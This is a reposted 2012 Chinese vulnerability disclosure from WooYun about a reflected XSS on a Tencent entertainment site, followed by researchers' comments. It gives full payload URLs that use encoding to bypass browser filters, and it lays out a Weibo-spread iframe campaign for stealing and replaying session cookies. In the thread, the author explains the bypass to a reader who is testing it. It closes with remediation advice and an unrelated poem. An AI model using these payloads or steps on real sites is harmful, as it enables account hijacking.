跨站脚本-可以让战场离得更远（浅谈腾讯架构缺陷）

漏洞详情

披露状态：  

2012-08-22： 细节已通知厂商并且等待厂商处理中

2012-08-23： 厂商已经确认，细节仅向厂商公开

2012-09-02： 细节向核心白帽子及相关领域专家公开

2012-09-12： 细节向普通白帽子公开

2012-09-22： 细节向实习白帽子公开

2012-10-07： 细节向公众公开

简要描述：

跨站脚本-可以让战场离得更远，战争更加隐蔽。。。

反射型XSS漏洞不严重？有兴趣看完这篇，自己来评价吧。。。

详细说明：

所有事件由一个反射型XSS开始。

先说说过程：

1、找个正规的站点，加入脚本代码（当然这个站是你可以控制的了，如自己的博客，正规大站的存储型跨站什么的。这样的情况应该很多，而且别人也不会在意。

这脚本实际就是一个 iframe ，然后链接是反射型的xss，当然还带有自己的盗取cookie的脚本代码。

2、在腾讯微博发一下简单的微博，带有上述外部正规站的链接（实战中可以加些更吸引的）

3、过几分钟后，效果来了。。。看图

4、cookie欺骗

可以看出，可以发微博，看邮箱，还有很多可以做。。。大家自由发挥。。。

如获取好友列表

http://pay.qq.com/cgi-bin/personal/get_user_friends.cgi

首先，公布下存在xss的地方

http://datalib.ent.qq.com/cgi-bin/search_ent?keyvalue=u003cimg%20src=%23%20onerror=eval%28/document.write('u003cscript src=aaau003eu003c/scriptu003e')/.source%29%20/u003e

http://datalib.ent.qq.com/cgi-bin/search?libid=1&attr=133&tname=star_second.shtml&keyvalue=u003cimg%20src=%23u0020onerror=eval....

存在的问题：

1、没有使用httponly

2、身份验证太单一。

这样的跨站十分隐蔽，一般极难发现。看到这个案例，你还敢乱点微博中邮箱中的链接么？

漏洞证明：

可以问问 zeracker

修复方案：

1、没有使用httponly

2、身份验证太单一。

白帽子讨论：

2012-08-22 22:19 | neal ( 普通白帽子 | Rank:82 漏洞数:9 | ">

求忽略,求公开.

1#

2012-08-22 22:31 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊！~又高又肥2个奶奶像地雷)

@Jannock 的文章是精品 求忽略 腾讯忽略咯啊

2#

2012-08-22 22:40 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

编辑漏洞 乌云可以编辑漏洞了。。。

3#

2012-08-22 22:41 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊！~又高又肥2个奶奶像地雷)

@Jannock 恭喜你看到了！

4#

2012-08-22 22:42 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

乌云一下又火起来啦～

5#

2012-08-22 22:43 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊！~又高又肥2个奶奶像地雷)

乌云一下又火起来啦～

6#

2012-08-22 22:47 | m4trix1 ( 实习白帽子 | Rank:10 漏洞数:2 | 绝对有jj)

这得要哪个年头才能看到

7#

2012-08-22 22:49 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥，怒了！)

我知道带头大哥是在做神马了。我是第一个受害者。/抓狂。。 /抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

8#

2012-08-22 22:50 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥，怒了！)

前段时间就劫持了我的企鹅号码。/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

9#

2012-08-22 23:01 | 情深( 实习白帽子 | Rank:12 漏洞数:4 | 安全小白)

求公开啊

10#

2012-08-22 23:56 | goderci ( 普通白帽子 | Rank:325 漏洞数:29 | http://www.yunday.org)

膜拜神牛

11#

2012-08-23 01:07 | se55i0n ( 普通白帽子 | Rank:523 漏洞数:74 | 世界末日要来了，各种求礼物呀~~)

求腾讯忽略公开~_~

12#

2012-08-23 08:53 | 大和尚( 普通白帽子 | Rank:39 漏洞数:4 | www.ieroot.com 积极向上的心态！百折不挠...)

又见大牛！！！ 关注关注关注！ 求公开求讲解

13#

2012-08-23 09:11 | zidane ( 实习白帽子 | Rank:13 漏洞数:2 | 噢 乖，你们应该明白 这样下去对我们谁都不...)

求分享 求妹纸

14#

2012-08-23 09:44 | 瘦蛟舞( 普通白帽子 | Rank:274 漏洞数:27 | http://www.yunday.org)

@Jannock 编辑漏洞在哪里=-=~，新发的才行？

15#

2012-08-23 09:58 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@瘦蛟舞 厂商没确认的才可以编辑

16#

2012-08-23 10:00 | 瘦蛟舞( 普通白帽子 | Rank:274 漏洞数:27 | http://www.yunday.org)

@Jannock 袄，知道了，谢谢~~~~~·

17#

2012-08-23 10:54 | xsser (核心白帽子 | Rank:249 漏洞数:17 | 极为缓慢，沉重，凝滞的前行)

这个漏洞我不信腾讯能补，还是多发几个公仔吧

18#

2012-08-23 10:56 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@xsser = = 难道是指的，一个站点的xss，就可以得到cookies，从而影响到很遥远的业务？

19#

2012-08-23 11:01 | xsser (核心白帽子 | Rank:249 漏洞数:17 | 极为缓慢，沉重，凝滞的前行)

@gainover 嘿嘿

20#

2012-08-23 13:45 | Max ( 普通白帽子 | Rank:45 漏洞数:7 | 每天都对自己说：一定要对自己好 一定要活...)

mark

21#

2012-08-23 16:59 | px1624 ( 普通白帽子 | Rank:55 漏洞数:7 | 电脑业余爱好者，菜鸟一个，是来交流学习的...)

@Max mark啥意思？

22#

2012-08-23 17:08 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@px1624 大学英语不好好学～～ mark 就是做个记号呗，以便下次来看的意思。

23#

2012-08-23 18:21 | horseluke ( 普通白帽子 | Rank:84 漏洞数:14 | Realize the dream in earnest.)

@xsser 的意思好邪恶啊...我在遥远的地方等你来 -_-||

24#

2012-08-24 14:08 | 啤酒( 普通白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

腾讯要是能补掉这些大家心照不宣的前期构架缺陷.就相当于把腾讯所有业务逻辑都全部重新做一遍.客户端的.web端的.

25#

2012-08-24 14:18 | px1624 ( 普通白帽子 | Rank:55 漏洞数:7 | 电脑业余爱好者，菜鸟一个，是来交流学习的...)

@gainover 哦，我知道mark是记号、书签的意思，还真是直接mark、、、-————唉

26#

2012-09-04 22:48 | seclab_zju ( 普通白帽子 | Rank:78 漏洞数:11 | 浙江大学 网络安全)

这么看来反射型xss也可以形成蠕虫哦。不断的在微博上传播就可以了。

27#

2012-09-05 08:46 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

会不会促使所有大站httponly呢……那xss还有明天么……

28#

2012-09-05 11:22 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@一刀终情 不是他们不想 http-only，现在他们业务线这么长，腾讯很多地方，程序员都是从 document.cookie里读取skey来使用的，一旦http-only的话，很多程序都要修改。 鉴于成本和可能出现的难以预料的问题，他们是不敢去更改的！！

29#

2012-09-05 12:15 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

@gainover 那这个他们真心没法补了，只能到处堵了……

30#

2012-09-05 18:36 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊！~又高又肥2个奶奶像地雷)

提醒：目前漏洞有限制开放中，你的 Rank 级别不够 ( 可以等待进一步公开或者支付 5 个乌云币提前查看

31#

2012-09-05 19:54 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

@Henry:bobo 5个WB而已，值得

32#

2012-09-26 09:47 | zzR ( 普通白帽子 | Rank:374 漏洞数:37 | 我所期待的仅仅是那突如其来的出乎意料)

貌似在J 神测试的时候，俺还点击了那个微博-0-，好怕怕

33#

2012-09-26 09:57 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

。。。。原来还可以这么用。。还好藏了一个qq.com的xss。。空了去玩玩

34#

2012-10-07 08:53 | Night ( 普通白帽子 | Rank:50 漏洞数:12 | 中国社工联盟站长)

木有腾讯的XSS肿么办

35#

2012-10-07 13:43 | 情深( 实习白帽子 | Rank:12 漏洞数:4 | 安全小白)

牛逼 啊，这么利用反射型xss不错

36#

2012-10-08 03:19 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

尝试了一下。不知道为什么我的javascript为什么没有运行。难道是因为我用的的形式导致主流浏览器拦截了xss??我这只收到了一个ie6发来的请求。。@Jannock 不知道你做过这个的浏览器兼容性测试没有

37#

2012-10-08 08:32 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@蟋蟀哥哥 你可以看到这个反射型XSS，u003c编码绕过了主流浏览器拦截。

38#

2012-10-08 10:24 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 多谢。

39#

2012-10-08 11:05 | unic02n ( 普通白帽子 | Rank:63 漏洞数:6 | 我是来学习的！)

这种关于架构的缺陷多的是，这就是前期不重视，而后期只能将错就错继续错下去的后果。造成后期的修复手段单一，只能是缝缝补补，不能从根本上解决此类问题。还有很多网站，也是如此。即便有时候认识到这个问题，但是开发和领导们也未必有魄力或者足够的认识去解决这个问题，安全在开发初期的介入是相当有必要的。

40#

2012-10-08 11:05 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 你的那个iframe里面用了img scr。是你的漏洞必须还是其他原因?能否把iframe代码文字性发下。。多谢

41#

2012-10-08 11:24 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@蟋蟀哥哥 就是这个反射xss是能过 innerHTML 形式注入的，所以使用 img onerror事件来执行脚本。。不能直接

2012-10-08 11:26 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 谢谢。。怪不得我这测试有问题。。继续测试去了

43#

2012-12-12 11:20 | 偶尔透透气( 实习白帽子 | Rank:6 漏洞数:1 | 常常潜潜水,偶尔透透气.)

漏洞证明太亮了

44#

转自：http://www.wooyun.org/bugs/wooyun-2010-011192

文章来源于lcx.cc:跨站脚本-可以让战场离得更远（浅谈腾讯架构缺陷）

相关推荐: 祝大家中秋快乐！

水调歌头·明月几时有   明月几时有？把酒问青天。 不知天上宫阙，今夕是何年。 我欲乘风归去，又恐琼楼玉宇，高处不胜寒。 起舞弄清影，何似在人间？ 转朱阁，低绮户，照无眠。   不应有恨，何事长向别时圆？ 人有悲欢离合，月有阴晴圆缺，此事古难全。 但愿人长久，…